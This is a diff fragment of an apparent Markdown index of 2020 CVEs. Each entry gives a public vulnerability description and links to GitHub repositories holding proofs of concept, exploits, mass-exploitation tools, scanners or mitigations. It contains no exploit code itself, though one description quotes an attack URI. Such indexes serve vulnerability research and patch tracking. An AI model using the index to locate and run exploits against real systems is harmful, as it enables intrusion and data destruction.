+### CVE-2020-5421 (2020-09-17)
+
+In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter.
+
+
+- [pandaMingx/CVE-2020-5421](https://github.com/pandaMingx/CVE-2020-5421)
+
+### CVE-2020-5504 (2020-01-09)
+
+In phpMyAdmin 4 before 4.9.4 and 5 before 5.0.1, SQL injection exists in the user accounts page. A malicious user could inject custom SQL in place of their own username when creating queries to this page. An attacker must have a valid MySQL account to access the server.
+
+
+- [xMohamed0/CVE-2020-5504-phpMyAdmin](https://github.com/xMohamed0/CVE-2020-5504-phpMyAdmin)
+
### CVE-2020-5509 (2020-01-14)
PHPGurukul Car Rental Project v1.0 allows Remote Code Execution via an executable file in an upload of a new profile image.
@@ -6432,6 +23800,13 @@
- [5l1v3r1/CVE-2020-5509](https://github.com/5l1v3r1/CVE-2020-5509)
+### CVE-2020-5510 (2020-01-08)
+
+PHPGurukul Hostel Management System v2.0 allows SQL injection via the id parameter in the full-profile.php file.
+
+
+- [5l1v3r1/CVE-2020-5510](https://github.com/5l1v3r1/CVE-2020-5510)
+
### CVE-2020-5752 (2020-05-21)
Relative path traversal in Druva inSync Windows Client 6.6.3 allows a local, unauthenticated attacker to execute arbitrary operating system commands with SYSTEM privileges.
@@ -6446,6 +23821,13 @@
- [RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write](https://github.com/RedyOpsResearchLabs/SEP-14.2-Arbitrary-Write)
+### CVE-2020-5839 (2020-07-08)
+
+Symantec Endpoint Detection And Response, prior to 4.4, may be susceptible to an information disclosure issue, which is a type of vulnerability that could potentially allow unauthorized access to data.
+
+
+- [nasbench/CVE-2020-5839](https://github.com/nasbench/CVE-2020-5839)
+
### CVE-2020-5842 (2020-01-07)
Codoforum 4.8.3 allows XSS in the user registration page: via the username field to the index.php?u=/user/register URI. The payload is, for example, executed on the admin/index.php?page=users/manage page.
@@ -6517,6 +23899,8 @@
- [murataydemir/CVE-2020-5902](https://github.com/murataydemir/CVE-2020-5902)
- [superzerosec/cve-2020-5902](https://github.com/superzerosec/cve-2020-5902)
- [ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability](https://github.com/ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability)
+- [faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner](https://github.com/faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner)
+- [haisenberg/CVE-2020-5902](https://github.com/haisenberg/CVE-2020-5902)
- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC)
- [z3n70/CVE-2020-5902](https://github.com/z3n70/CVE-2020-5902)
- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack)
@@ -6529,6 +23913,13 @@
- [ltvthang/CVE-2020-5903](https://github.com/ltvthang/CVE-2020-5903)
+### CVE-2020-6207 (2020-03-10)
+
+SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager.
+
+
+- [chipik/SAP_EEM_CVE-2020-6207](https://github.com/chipik/SAP_EEM_CVE-2020-6207)
+
### CVE-2020-6286 (2020-07-14)
The insufficient input path validation of certain parameter in the web service of SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40, 7.50, allows an unauthenticated attacker to exploit a method to download zip files to a specific directory, leading to Path Traversal.
@@ -6555,6 +23946,7 @@
- [InitRoot/CVE-2020-6308-PoC](https://github.com/InitRoot/CVE-2020-6308-PoC)
- [freeFV/CVE-2020-6308-mass-exploiter](https://github.com/freeFV/CVE-2020-6308-mass-exploiter)
+- [TheMMMdev/CVE-2020-6308](https://github.com/TheMMMdev/CVE-2020-6308)
### CVE-2020-6364 (2020-10-15)
@@ -6570,6 +23962,8 @@
- [ChoKyuWon/CVE-2020-6418](https://github.com/ChoKyuWon/CVE-2020-6418)
- [Goyotan/CVE-2020-6418-PoC](https://github.com/Goyotan/CVE-2020-6418-PoC)
+- [ulexec/ChromeSHELFLoader](https://github.com/ulexec/ChromeSHELFLoader)
+- [SivaPriyaRanganatha/CVE-2020-6418](https://github.com/SivaPriyaRanganatha/CVE-2020-6418)
### CVE-2020-6468 (2020-05-21)
@@ -6586,6 +23980,13 @@
- [R0jhack/CVE-2020-6514](https://github.com/R0jhack/CVE-2020-6514)
+### CVE-2020-6516 (2020-07-22)
+
+Policy bypass in CORS in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to leak cross-origin data via a crafted HTML page.
+
+
+- [CENSUS/whatsapp-mitd-mitm](https://github.com/CENSUS/whatsapp-mitd-mitm)
+
### CVE-2020-6519 (2020-07-22)
Policy bypass in CSP in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to bypass content security policy via a crafted HTML page.
@@ -6610,6 +24011,27 @@
### CVE-2020-6888
- [section-c/CVE-2020-6888](https://github.com/section-c/CVE-2020-6888)
+### CVE-2020-7048 (2020-01-16)
+
+The WordPress plugin, WP Database Reset through 3.1, contains a flaw that allowed any unauthenticated user to reset any table in the database to the initial WordPress set-up state (deleting all site content stored in that table), as demonstrated by a wp-admin/admin-post.php?db-reset-tables[]=comments URI.
+
+
+- [ElmouradiAmine/CVE-2020-7048](https://github.com/ElmouradiAmine/CVE-2020-7048)
+
+### CVE-2020-7115 (2020-06-03)
+
+The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then execute an exploit that would allow to remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and higher.
+
+
+- [Retr02332/CVE-2020-7115](https://github.com/Retr02332/CVE-2020-7115)
+
+### CVE-2020-7200 (2020-12-18)
+
+A potential security vulnerability has been identified in HPE Systems Insight Manager (SIM) version 7.6. The vulnerability could be exploited to allow remote code execution.
+
+
+- [alexfrancow/CVE-2020-7200](https://github.com/alexfrancow/CVE-2020-7200)
+
### CVE-2020-7246 (2020-01-21)
A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.
@@ -6627,6 +24049,11 @@
- [FiroSolutions/cve-2020-7247-exploit](https://github.com/FiroSolutions/cve-2020-7247-exploit)
- [superzerosec/cve-2020-7247](https://github.com/superzerosec/cve-2020-7247)
- [r0lh/CVE-2020-7247](https://github.com/r0lh/CVE-2020-7247)
+- [QTranspose/CVE-2020-7247-exploit](https://github.com/QTranspose/CVE-2020-7247-exploit)
+- [bytescrappers/CVE-2020-7247](https://github.com/bytescrappers/CVE-2020-7247)
+- [f4T1H21/CVE-2020-7247](https://github.com/f4T1H21/CVE-2020-7247)
+- [SimonSchoeni/CVE-2020-7247-POC](https://github.com/SimonSchoeni/CVE-2020-7247-POC)
+- [presentdaypresenttime/shai_hulud](https://github.com/presentdaypresenttime/shai_hulud)
### CVE-2020-7283 (2020-07-03)
@@ -6635,11 +24062,26 @@
- [RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP](https://github.com/RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP)
+### CVE-2020-7352 (2020-04-28)
+
+The GalaxyClientService component of GOG Galaxy runs with elevated SYSTEM privileges in a Windows environment. Due to the software shipping with embedded, static RSA private key, an attacker with this key material and local user permissions can effectively send any operating system command to the service for execution in this elevated context. The service listens for such commands on a locally-bound network port, localhost:9978. A Metasploit module has been published which exploits this vulnerability. This issue affects the 2.0.x branch of the software (2.0.12 and earlier) as well as the 1.2.x branch (1.2.64 and earlier). A fix was issued for the 2.0.x branch of the affected software.
+
+
+- [szerszen199/PS-CVE-2020-7352](https://github.com/szerszen199/PS-CVE-2020-7352)
+
+### CVE-2020-7378 (2020-11-24)
+
+CRIXP OpenCRX version 4.30 and 5.0-20200717 and prior suffers from an unverified password change vulnerability. An attacker who is able to connect to the affected OpenCRX instance can change the password of any user, including admin-Standard, to any chosen value. This issue was resolved in version 5.0-20200904, released September 4, 2020.
+
+
+- [ruthvikvegunta/openCRX-CVE-2020-7378](https://github.com/ruthvikvegunta/openCRX-CVE-2020-7378)
+
### CVE-2020-7384 (2020-10-29)
Rapid7's Metasploit msfvenom framework handles APK files in a way that allows for a malicious user to craft and publish a file that would execute arbitrary commands on a victim's machine.
+- [nikhil1232/CVE-2020-7384](https://github.com/nikhil1232/CVE-2020-7384)
- [0xCarsonS/CVE-2020-7384](https://github.com/0xCarsonS/CVE-2020-7384)
### CVE-2020-7388 (2021-07-07)
@@ -6654,6 +24096,7 @@
In FreeBSD 12.1-STABLE before r365010, 11.4-STABLE before r365011, 12.1-RELEASE before p9, 11.4-RELEASE before p3, and 11.3-RELEASE before p13, dhclient(8) fails to handle certain malformed input related to handling of DHCP option 119 resulting a heap overflow. The heap overflow could in principle be exploited to achieve remote code execution. The affected process runs with reduced privileges in a Capsicum sandbox, limiting the immediate impact of an exploit.
+- [knqyf263/CVE-2020-7461](https://github.com/knqyf263/CVE-2020-7461)
- [0xkol/freebsd-dhclient-poc](https://github.com/0xkol/freebsd-dhclient-poc)
### CVE-2020-7471 (2020-02-03)
@@ -6666,6 +24109,8 @@
- [SNCKER/CVE-2020-7471](https://github.com/SNCKER/CVE-2020-7471)
- [Tempuss/CTF_CVE-2020-7471](https://github.com/Tempuss/CTF_CVE-2020-7471)
- [victomteng1997/cve-2020-7471-Time_Blind_SQLi-](https://github.com/victomteng1997/cve-2020-7471-Time_Blind_SQLi-)
+- [huzaifakhan771/CVE-2020-7471-Django](https://github.com/huzaifakhan771/CVE-2020-7471-Django)
+- [mrlihd/CVE-2020-7471](https://github.com/mrlihd/CVE-2020-7471)
### CVE-2020-7473 (2020-05-07)
@@ -6688,6 +24133,20 @@
- [andsnw/sockjs-dos-py](https://github.com/andsnw/sockjs-dos-py)
+### CVE-2020-7699 (2020-07-30)
+
+This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.
+
+
+- [hemaoqi-Tom/CVE-2020-7699_reproduce](https://github.com/hemaoqi-Tom/CVE-2020-7699_reproduce)
+
+### CVE-2020-7740 (2020-10-06)
+
+This affects all versions of package node-pdf-generator. Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a url that will be passed to an external server allowing an SSRF attack.
+
+
+- [CS4239-U6/node-pdf-generator-ssrf](https://github.com/CS4239-U6/node-pdf-generator-ssrf)
+
### CVE-2020-7799 (2020-01-28)
An issue was discovered in FusionAuth before 1.11.0. An authenticated user, allowed to edit e-mail templates (Home -> Settings -> Email Templates) or themes (Home -> Settings -> Themes), can execute commands on the underlying operating system by abusing freemarker.template.utility.Execute in the Apache FreeMarker engine that processes custom templates.
@@ -6712,6 +24171,7 @@
- [3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934](https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934)
+- [Sergio235705/audit-xss-cve-2020-7934](https://github.com/Sergio235705/audit-xss-cve-2020-7934)
### CVE-2020-7961 (2020-03-20)
@@ -6724,6 +24184,9 @@
- [shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui](https://github.com/shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui)
- [shacojx/GLiferay-CVE-2020-7961-golang](https://github.com/shacojx/GLiferay-CVE-2020-7961-golang)
- [shacojx/POC-CVE-2020-7961-Token-iterate](https://github.com/shacojx/POC-CVE-2020-7961-Token-iterate)
+- [Udyz/CVE-2020-7961-Mass](https://github.com/Udyz/CVE-2020-7961-Mass)
+- [ShutdownRepo/CVE-2020-7961](https://github.com/ShutdownRepo/CVE-2020-7961)
+- [pashayogi/CVE-2020-7961-Mass](https://github.com/pashayogi/CVE-2020-7961-Mass)
- [manrop2702/CVE-2020-7961](https://github.com/manrop2702/CVE-2020-7961)
- [NMinhTrung/LIFERAY-CVE-2020-7961](https://github.com/NMinhTrung/LIFERAY-CVE-2020-7961)
@@ -6772,6 +24235,18 @@
- [masahiro331/CVE-2020-8165](https://github.com/masahiro331/CVE-2020-8165)
- [umiterkol/CVE-2020-8165--Auto-Shell](https://github.com/umiterkol/CVE-2020-8165--Auto-Shell)
- [taipansec/CVE-2020-8165](https://github.com/taipansec/CVE-2020-8165)
+- [hybryx/CVE-2020-8165](https://github.com/hybryx/CVE-2020-8165)
+- [AssassinUKG/CVE-2020-8165](https://github.com/AssassinUKG/CVE-2020-8165)
+- [progfay/CVE-2020-8165](https://github.com/progfay/CVE-2020-8165)
+- [danielklim/cve-2020-8165-demo](https://github.com/danielklim/cve-2020-8165-demo)
+
+### CVE-2020-8175 (2020-07-24)
+
+Uncontrolled resource consumption in `jpeg-js` before 0.4.0 may allow attacker to launch denial of service attacks using specially a crafted JPEG image.
+
+
+- [knokbak/get-pixels-updated](https://github.com/knokbak/get-pixels-updated)
+- [knokbak/save-pixels-updated](https://github.com/knokbak/save-pixels-updated)
### CVE-2020-8193 (2020-07-10)
@@ -6839,6 +24314,14 @@
- [masahiro331/CVE-2020-8277](https://github.com/masahiro331/CVE-2020-8277)
+- [AndrewIjano/CVE-2020-8277](https://github.com/AndrewIjano/CVE-2020-8277)
+
+### CVE-2020-8287 (2021-01-06)
+
+Node.js versions before 10.23.1, 12.20.1, 14.15.4, 15.5.1 allow two copies of a header field in an HTTP request (for example, two Transfer-Encoding header fields). In this case, Node.js identifies the first header field and ignores the second. This can lead to HTTP Request Smuggling.
+
+
+- [progfay/nodejs-http-transfer-encoding-smuggling-poc](https://github.com/progfay/nodejs-http-transfer-encoding-smuggling-poc)
### CVE-2020-8289 (2020-12-27)
@@ -6854,6 +24337,13 @@
- [geffner/CVE-2020-8290](https://github.com/geffner/CVE-2020-8290)
+### CVE-2020-8300 (2021-06-16)
+
+Citrix ADC and Citrix/NetScaler Gateway before 13.0-82.41, 12.1-62.23, 11.1-65.20 and Citrix ADC 12.1-FIPS before 12.1-55.238 suffer from improper access control allowing SAML authentication hijack through a phishing attack to steal a valid user session. Note that Citrix ADC or Citrix Gateway must be configured as a SAML SP or a SAML IdP for this to be possible.
+
+
+- [stuartcarroll/CitrixADC-CVE-2020-8300](https://github.com/stuartcarroll/CitrixADC-CVE-2020-8300)
+
### CVE-2020-8417 (2020-01-28)
The Code Snippets plugin before 2.14.0 for WordPress allows CSRF because of the lack of a Referer check on the import menu.
@@ -6885,6 +24375,7 @@
- [imjdl/CVE-2020-8515-PoC](https://github.com/imjdl/CVE-2020-8515-PoC)
- [truerandom/nmap_draytek_rce](https://github.com/truerandom/nmap_draytek_rce)
+- [darrenmartyn/CVE-2020-8515](https://github.com/darrenmartyn/CVE-2020-8515)
### CVE-2020-8554 (2020-12-07)
@@ -6894,6 +24385,8 @@
- [rancher/externalip-webhook](https://github.com/rancher/externalip-webhook)
- [jrmurray000/CVE-2020-8554](https://github.com/jrmurray000/CVE-2020-8554)
- [twistlock/k8s-cve-2020-8554-mitigations](https://github.com/twistlock/k8s-cve-2020-8554-mitigations)
+- [Dviejopomata/CVE-2020-8554](https://github.com/Dviejopomata/CVE-2020-8554)
+- [alebedev87/gatekeeper-cve-2020-8554](https://github.com/alebedev87/gatekeeper-cve-2020-8554)
### CVE-2020-8558 (2020-04-18)
@@ -6919,6 +24412,7 @@
- [dointisme/CVE-2020-8597](https://github.com/dointisme/CVE-2020-8597)
- [WinMin/CVE-2020-8597](https://github.com/WinMin/CVE-2020-8597)
- [Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-](https://github.com/Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-)
+- [lakwsh/CVE-2020-8597](https://github.com/lakwsh/CVE-2020-8597)
### CVE-2020-8617 (2020-05-19)
@@ -6935,6 +24429,13 @@
- [Al1ex/CVE-2020-8635](https://github.com/Al1ex/CVE-2020-8635)
+### CVE-2020-8637 (2020-04-03)
+
+A SQL injection vulnerability in TestLink 1.9.20 allows attackers to execute arbitrary SQL commands in dragdroptreenodes.php via the node_id parameter.
+
+
+- [DXY0411/CVE-2020-8637](https://github.com/DXY0411/CVE-2020-8637)
+
### CVE-2020-8644 (2020-02-05)
PlaySMS before 1.4.3 does not sanitize inputs from a malicious string.
@@ -6955,6 +24456,8 @@
- [mhaskar/CVE-2020-8813](https://github.com/mhaskar/CVE-2020-8813)
+- [0xm4ud/Cacti-CVE-2020-8813](https://github.com/0xm4ud/Cacti-CVE-2020-8813)
+- [hexcowboy/CVE-2020-8813](https://github.com/hexcowboy/CVE-2020-8813)
- [p0dalirius/CVE-2020-8813-Cacti-RCE-in-graph_realtime](https://github.com/p0dalirius/CVE-2020-8813-Cacti-RCE-in-graph_realtime)
### CVE-2020-8816 (2020-05-29)
@@ -6983,6 +24486,7 @@
- [snappyJack/Rick_write_exp_CVE-2020-8835](https://github.com/snappyJack/Rick_write_exp_CVE-2020-8835)
- [zilong3033/CVE-2020-8835](https://github.com/zilong3033/CVE-2020-8835)
- [SplendidSky/CVE-2020-8835](https://github.com/SplendidSky/CVE-2020-8835)
+- [digamma-ai/CVE-2020-8835-verification](https://github.com/digamma-ai/CVE-2020-8835-verification)
- [johnatag/INF8602-CVE-2020-8835](https://github.com/johnatag/INF8602-CVE-2020-8835)
### CVE-2020-8840 (2020-02-10)
@@ -6995,6 +24499,7 @@
- [fairyming/CVE-2020-8840](https://github.com/fairyming/CVE-2020-8840)
- [Blyth0He/CVE-2020-8840](https://github.com/Blyth0He/CVE-2020-8840)
- [Veraxy00/CVE-2020-8840](https://github.com/Veraxy00/CVE-2020-8840)
+- [dpredrag/CVE-2020-8840](https://github.com/dpredrag/CVE-2020-8840)
### CVE-2020-8841 (2020-02-10)
@@ -7019,6 +24524,7 @@
- [qurbat/CVE-2020-8958](https://github.com/qurbat/CVE-2020-8958)
+- [Asjidkalam/CVE-2020-8958](https://github.com/Asjidkalam/CVE-2020-8958)
### CVE-2020-9006 (2020-02-17)
@@ -7048,6 +24554,13 @@
- [norrismw/CVE-2020-9047](https://github.com/norrismw/CVE-2020-9047)
+### CVE-2020-9054 (2020-02-20)
+
+Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2
+
+
+- [darrenmartyn/CVE-2020-9054](https://github.com/darrenmartyn/CVE-2020-9054)
+
### CVE-2020-9273 (2020-02-20)
In ProFTPD 1.3.7, it is possible to corrupt the memory pool by interrupting the data transfer channel. This triggers a use-after-free in alloc_pool in pool.c, and possible remote code execution.
@@ -7125,6 +24638,21 @@
- [Al1ex/CVE-2020-9470](https://github.com/Al1ex/CVE-2020-9470)
+### CVE-2020-9472 (2020-03-16)
+
+Umbraco CMS 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Package functionality.
+
+
+- [john-dooe/CVE-2020-9472](https://github.com/john-dooe/CVE-2020-9472)
+
+### CVE-2020-9483 (2020-06-30)
+
+**Resolved** When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
+
+
+- [shanika04/apache_skywalking](https://github.com/shanika04/apache_skywalking)
+- [Neko-chanQwQ/CVE-2020-9483](https://github.com/Neko-chanQwQ/CVE-2020-9483)
+
### CVE-2020-9484 (2020-05-20)
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.
@@ -7138,6 +24666,12 @@
- [osamahamad/CVE-2020-9484-Mass-Scan](https://github.com/osamahamad/CVE-2020-9484-Mass-Scan)
- [anjai94/CVE-2020-9484-exploit](https://github.com/anjai94/CVE-2020-9484-exploit)
- [PenTestical/CVE-2020-9484](https://github.com/PenTestical/CVE-2020-9484)
+- [DanQMoo/CVE-2020-9484-Scanner](https://github.com/DanQMoo/CVE-2020-9484-Scanner)
+- [AssassinUKG/CVE-2020-9484](https://github.com/AssassinUKG/CVE-2020-9484)
+- [VICXOR/CVE-2020-9484](https://github.com/VICXOR/CVE-2020-9484)
+- [DXY0411/CVE-2020-9484](https://github.com/DXY0411/CVE-2020-9484)
+- [RepublicR0K/CVE-2020-9484](https://github.com/RepublicR0K/CVE-2020-9484)
+- [ColdFusionX/CVE-2020-9484](https://github.com/ColdFusionX/CVE-2020-9484)
- [d3fudd/CVE-2020-9484_Exploit](https://github.com/d3fudd/CVE-2020-9484_Exploit)
### CVE-2020-9495 (2020-06-19)
@@ -7153,6 +24687,12 @@
- [dwisiswant0/CVE-2020-9496](https://github.com/dwisiswant0/CVE-2020-9496)
+- [Vulnmachines/apache-ofbiz-CVE-2020-9496](https://github.com/Vulnmachines/apache-ofbiz-CVE-2020-9496)
+- [g33xter/CVE-2020-9496](https://github.com/g33xter/CVE-2020-9496)
+- [cyber-niz/CVE-2020-9496](https://github.com/cyber-niz/CVE-2020-9496)
+- [yuaneuro/ofbiz-poc](https://github.com/yuaneuro/ofbiz-poc)
+- [ambalabanov/CVE-2020-9496](https://github.com/ambalabanov/CVE-2020-9496)
+- [s4dbrd/CVE-2020-9496](https://github.com/s4dbrd/CVE-2020-9496)
- [Ly0nt4r/CVE-2020-9496](https://github.com/Ly0nt4r/CVE-2020-9496)
- [birdlinux/CVE-2020-9496](https://github.com/birdlinux/CVE-2020-9496)
@@ -7175,6 +24715,7 @@
Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have an use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution .
+- [lsw29475/CVE-2020-9715](https://github.com/lsw29475/CVE-2020-9715)
- [wonjunchun/CVE-2020-9715](https://github.com/wonjunchun/CVE-2020-9715)
### CVE-2020-9758 (2020-03-09)
@@ -7198,6 +24739,13 @@
- [khcujw/CVE-2020-9802](https://github.com/khcujw/CVE-2020-9802)
+### CVE-2020-9922 (2020-12-08)
+
+A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra. Processing a maliciously crafted email may lead to writing arbitrary files.
+
+
+- [Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922](https://github.com/Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922)
+
### CVE-2020-9934 (2020-10-16)
An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A local user may be able to view sensitive user information.
@@ -7260,6 +24808,8 @@
- [rdoix/CVE-2020-10148-Solarwinds-Orion](https://github.com/rdoix/CVE-2020-10148-Solarwinds-Orion)
+- [Udyz/CVE-2020-10148-Solarwinds-Orion](https://github.com/Udyz/CVE-2020-10148-Solarwinds-Orion)
+- [B1anda0/CVE-2020-10148](https://github.com/B1anda0/CVE-2020-10148)
### CVE-2020-10189 (2020-03-06)
@@ -7317,6 +24867,7 @@
- [nullze/CVE-2020-10558](https://github.com/nullze/CVE-2020-10558)
+- [AmazingOut/Tesla-CVE-2020-10558](https://github.com/AmazingOut/Tesla-CVE-2020-10558)
### CVE-2020-10560 (2020-03-30)
@@ -7370,6 +24921,13 @@
- [knqyf263/CVE-2020-10749](https://github.com/knqyf263/CVE-2020-10749)
+### CVE-2020-10757 (2020-06-09)
+
+A flaw was found in the Linux Kernel in versions after 4.5-rc1 in the way mremap handled DAX Huge Pages. This flaw allows a local attacker with access to a DAX enabled storage to escalate their privileges on the system.
+
+
+- [ShaikUsaf/linux-4.19.72_CVE-2020-10757](https://github.com/ShaikUsaf/linux-4.19.72_CVE-2020-10757)
+
### CVE-2020-10759 (2020-09-15)
A PGP signature bypass flaw was found in fwupd (all versions), which could lead to the installation of unsigned firmware. As per upstream, a signature bypass is theoretically possible, but not practical because the Linux Vendor Firmware Service (LVFS) is either not implemented or enabled in versions of fwupd shipped with Red Hat Enterprise Linux 7 and 8. The highest threat from this vulnerability is to confidentiality and integrity.
@@ -7391,6 +24949,20 @@
- [lnversed/CVE-2020-10882](https://github.com/lnversed/CVE-2020-10882)
+### CVE-2020-10915 (2020-04-22)
+
+This vulnerability allows remote attackers to execute arbitrary code on affected installations of VEEAM One Agent 9.5.4.4587. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HandshakeResult method. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-10401.
+
+
+- [Cinnamon1212/Modified-CVE-2020-10915-MsfModule](https://github.com/Cinnamon1212/Modified-CVE-2020-10915-MsfModule)
+
+### CVE-2020-10963 (2020-03-25)
+
+FrozenNode Laravel-Administrator through 5.0.12 allows unrestricted file upload (and consequently Remote Code Execution) via admin/tips_image/image/file_upload image upload with PHP content within a GIF image that has the .php extension. NOTE: this product is discontinued.
+
+
+- [scopion/CVE-2020-10963](https://github.com/scopion/CVE-2020-10963)
+
### CVE-2020-10977 (2020-04-08)
GitLab EE/CE 8.5 to 12.9 is vulnerable to a an path traversal when moving an issue between projects.
@@ -7399,6 +24971,11 @@
- [KooroshRZ/CVE-2020-10977](https://github.com/KooroshRZ/CVE-2020-10977)
- [thewhiteh4t/cve-2020-10977](https://github.com/thewhiteh4t/cve-2020-10977)
- [JustMichi/CVE-2020-10977.py](https://github.com/JustMichi/CVE-2020-10977.py)
+- [JayHerlth/cve-2020-10977](https://github.com/JayHerlth/cve-2020-10977)
+- [erk3/gitlab-12.9.0-file-read](https://github.com/erk3/gitlab-12.9.0-file-read)
+- [liath/CVE-2020-10977](https://github.com/liath/CVE-2020-10977)
+- [lisp3r/cve-2020-10977-read-and-execute](https://github.com/lisp3r/cve-2020-10977-read-and-execute)
+- [vandycknick/gitlab-cve-2020-10977](https://github.com/vandycknick/gitlab-cve-2020-10977)
### CVE-2020-11019 (2020-05-29)
@@ -7413,12 +24990,14 @@
- [0xAJ2K/CVE-2020-11022-CVE-2020-11023](https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023)
+- [Snorlyd/https-nj.gov---CVE-2020-11022](https://github.com/Snorlyd/https-nj.gov---CVE-2020-11022)
### CVE-2020-11023 (2020-04-29)
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
+- [Snorlyd/https-nj.gov---CVE-2020-11023](https://github.com/Snorlyd/https-nj.gov---CVE-2020-11023)
- [Cybernegro/CVE-2020-11023](https://github.com/Cybernegro/CVE-2020-11023)
- [andreassundstrom/cve-2020-11023-demonstration](https://github.com/andreassundstrom/cve-2020-11023-demonstration)
@@ -7501,6 +25080,14 @@
- [the-girl-who-lived/CVE-2020-11539](https://github.com/the-girl-who-lived/CVE-2020-11539)
+### CVE-2020-11546 (2020-07-14)
+
+SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.
+
+
+- [Official-BlackHat13/CVE-2020-11546](https://github.com/Official-BlackHat13/CVE-2020-11546)
+- [damit5/CVE-2020-11546](https://github.com/damit5/CVE-2020-11546)
+
### CVE-2020-11547 (2020-04-04)
PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself (CPU usage, memory, Windows version, and internal statistics) via an HTTP request, as demonstrated by type=probes to login.htm or index.htm.
@@ -7560,6 +25147,20 @@
### CVE-2020-11794
